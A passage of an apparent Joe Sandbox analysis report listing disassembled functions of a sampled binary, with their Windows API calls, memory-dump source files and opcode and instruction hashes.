                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54017177A016197F3325767A6C88D7B7A6DEFC2B75724012AFD04C6244DA648D01A1B0
                                                                                                                                                                                                                                                                                        Function 00F66078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _memcmp
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4543626c5d67032571fef2dae59d8c3f293c6f28cb983107ad7de68318adeab8
                                                                                                                                                                                                                                                                                        • Instruction ID: 1d045d309196c40257adbb805c2b7df852dca1bca47cb5ccb2dffc7f6f1727e9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4543626c5d67032571fef2dae59d8c3f293c6f28cb983107ad7de68318adeab8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A50175E2A043157B96145621AD42FAB735DAEA13A8F004135FD06DB242EB75ED10F2A5
                                                                                                                                                                                                                                                                                        Function 00F3316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(0000000A,?,?,00F2F64E,00F2545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F33170
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F331A5
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F331CC
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F331D9
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F331E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 713f4f0ab5e1f8f76d68d5a860ef115d111dcfe495b4f46a03730dec303ab0ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 943d1035bab0b5845f7a54b38b47d152e76ada04c7071ee51447a7929fb3fbfa
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 713f4f0ab5e1f8f76d68d5a860ef115d111dcfe495b4f46a03730dec303ab0ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9601C872F446007B9612F734AC86E2F366DAFC1372F340426F925D3291EF69CA017161
                                                                                                                                                                                                                                                                                        Function 00F608FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?,?,00F60C4E), ref: 00F6091B
                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60936
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60944
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?), ref: 00F60954
                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60960
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                        • Opcode ID: aace6997042e361b3067eab08a1c16d90899ab0d5d484275f93ddf2aafe2ace5
                                                                                                                                                                                                                                                                                        • Instruction ID: b29cb49159a280b90c161cbf16a958f0c8da575f7c615217265b8d2e438fe1d8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aace6997042e361b3067eab08a1c16d90899ab0d5d484275f93ddf2aafe2ace5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F018F72A10208AFEB114F55DC44B9B7AAEEB847A2F340125F905E2212DBB1DD40BBA0
                                                                                                                                                                                                                                                                                        Function 00F6F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F6F2AE
                                                                                                                                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 00F6F2BC
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00F6F2C4
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F6F2CE
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0d78fd65aed298a57b7f61a09a59c1c4b8325657e2c33d69c3aa6ea4f5007172
                                                                                                                                                                                                                                                                                        • Instruction ID: 9833e83b6c1a75433ff59f078957fd49473cf4be128caf8af8029958b3e92183
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d78fd65aed298a57b7f61a09a59c1c4b8325657e2c33d69c3aa6ea4f5007172
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48014076D0151DDBDF00EFB4EC49AEDBB78FB08711F110466E501B2254DB349558EBA1
                                                                                                                                                                                                                                                                                        Function 00F61A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61A60
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A6C
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A7B
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A82
                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F61A99
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cccbcd7c07977e3c5a97243f11601836df010232de183177e2a4fa6782c4fa94
                                                                                                                                                                                                                                                                                        • Instruction ID: b1422bf48cbaa623c94c1649f3ca2a0696425f9a38e0959dc6c670c3ac736d67
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cccbcd7c07977e3c5a97243f11601836df010232de183177e2a4fa6782c4fa94
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C901AFB9A01309BFEB114FA9DC48E6B3B7EFF883A4B250415F845C3260DA31DC41EA60
                                                                                                                                                                                                                                                                                        Function 00F61960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F61976
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F61982
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61991
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61998
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F619AE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c201d37c37b6eca301293dca610d78387ad2be20f3b2081de582f0f29f77627c
                                                                                                                                                                                                                                                                                        • Instruction ID: 89a546bb9c4ce6fd0e15824e98cc41a579da837189eb1f5d9789e507ea9b2792
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c201d37c37b6eca301293dca610d78387ad2be20f3b2081de582f0f29f77627c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45F06276500309BBDB214F64EC59F5B3B6DFF897A1F240515F945C7261CA70D840EA60
                                                                                                                                                                                                                                                                                        Function 00F61900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F61916
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F61922
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F61931
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F61938
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F6194E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 39ea3f3668d4f55cd4e2ad63613a06b9bdf8d5306e48598a3f74f4fe5c8f9fd1
                                                                                                                                                                                                                                                                                        • Instruction ID: 699edd33aab6e4743acebb960f90971d16565622a3b192c0e0a4e4af4e4d5bdf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39ea3f3668d4f55cd4e2ad63613a06b9bdf8d5306e48598a3f74f4fe5c8f9fd1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CF06D7660030ABBDB210FA5DC4DF5A3BADFF897A1F640416FA45D72A1CA70DC40EA60
                                                                                                                                                                                                                                                                                        Function 00F70CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CCB
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CD8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CE5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CF2
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CFF
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70D0C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2988ad24e18b94d358ce1fae170054afe265775a01dd7b645c3891da14bb8f22
                                                                                                                                                                                                                                                                                        • Instruction ID: a2abd91b660029d849a2f269718ea9ab3084af2de6256448fc10b78192898d0a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2988ad24e18b94d358ce1fae170054afe265775a01dd7b645c3891da14bb8f22
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F201A271800B15DFCB31AF66D980816F7F5BF503253158A3FD19A52931CBB0A944EF81
                                                                                                                                                                                                                                                                                        Function 00F665AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F665BF
                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F665D6
                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00F665EE
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00F6660A
                                                                                                                                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00F66624
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 137e4a8d4b4613037bb6bf43352e8423bf6eb99a0fd420a87072e08686832f26
                                                                                                                                                                                                                                                                                        • Instruction ID: ca16fea8e1cd99cda8ca490b99f11de884cf79685daa118c13fa1a14f7d4cee7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 137e4a8d4b4613037bb6bf43352e8423bf6eb99a0fd420a87072e08686832f26
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC018631900308ABEB305F10EE4EB967B7CFB00705F04055AA187A20E1DBF5AA54AA90
                                                                                                                                                                                                                                                                                        Function 00F3DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DAD2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DAE4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DAF6
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DB08
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DB1A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 515cda88ec15c850507b67f6f91a535b5485ba9c764c1f06a405d1c55284ec9b
                                                                                                                                                                                                                                                                                        • Instruction ID: 84d618f89b58212d2b3b75a9b04a37499f2984f5f308a362d51bad26728af522
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 515cda88ec15c850507b67f6f91a535b5485ba9c764c1f06a405d1c55284ec9b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAF01D72944208ABC664EB68FEC2C1AB7EDEE44730BA50C19F109D7551CB38FC80AA64
                                                                                                                                                                                                                                                                                        Function 00F32610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3262E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32640
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32653
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32664
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32675
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
